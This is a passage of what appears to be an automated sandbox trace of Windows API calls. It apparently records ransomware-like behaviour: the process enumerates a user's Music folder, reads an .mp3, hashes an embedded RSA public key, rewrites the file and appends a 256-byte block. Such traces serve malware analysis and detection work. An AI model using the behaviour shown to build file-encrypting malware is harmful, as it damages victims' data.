ftLastWriteTime.dwHighDateTime=0x1d8a457, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUhvLY4JeAGwk", cAlternateFileName="FUHVLY~1")) returned 1 [0186.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0186.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0186.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0186.957] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa272c00, ftCreationTime.dwHighDateTime=0x1d8a127, ftLastAccessTime.dwLowDateTime=0x7a4cbaa0, ftLastAccessTime.dwHighDateTime=0x1d8a72f, ftLastWriteTime.dwLowDateTime=0x7a4cbaa0, ftLastWriteTime.dwHighDateTime=0x1d8a72f, nFileSizeHigh=0x0, nFileSizeLow=0x3b93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oolp hJaohuLco5czCDI.mp3", cAlternateFileName="OOLPHJ~1.MP3")) returned 1 [0186.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d389a0 [0186.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0186.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d389a0 | out: hHeap=0x6a0000) returned 1 [0186.957] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\Oolp hJaohuLco5czCDI.mp3") returned=".mp3" [0186.957] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\Oolp hJaohuLco5czCDI.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\oolp hjaohulco5czcdi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0186.960] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=15251) returned 1 [0186.960] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0186.963] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3b6d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.963] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0186.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.965] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.965] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x3b93, lpOverlapped=0x0) returned 1 [0186.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0186.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.966] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0186.967] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0186.967] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0186.967] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0186.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0186.968] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0186.968] GetLastError () returned 0x0 [0186.968] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0186.968] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0186.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0186.968] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0186.968] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0186.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.968] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0186.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3b90) returned 0x2d43778 [0186.969] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0186.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d389a0 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d389e8 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0186.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0186.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0186.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0186.970] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3bb48 [0186.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0186.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0186.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39688 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0186.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0186.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0186.973] GetCurrentThreadId () returned 0x264 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37768 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0186.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.974] GetCurrentThreadId () returned 0x264 [0186.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0186.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0186.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0186.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39688 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396b8 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39700 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0186.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396e8 [0186.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eae0 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39700 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0186.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0186.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0186.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0186.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0186.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0186.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0186.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0186.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0186.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0186.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0186.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0186.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d389e8 | out: hHeap=0x6a0000) returned 1 [0186.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0186.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0186.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0186.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0186.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0186.984] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x3b8e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x3b8e, lpOverlapped=0x0) returned 1 [0186.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0186.985] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3b93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.985] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 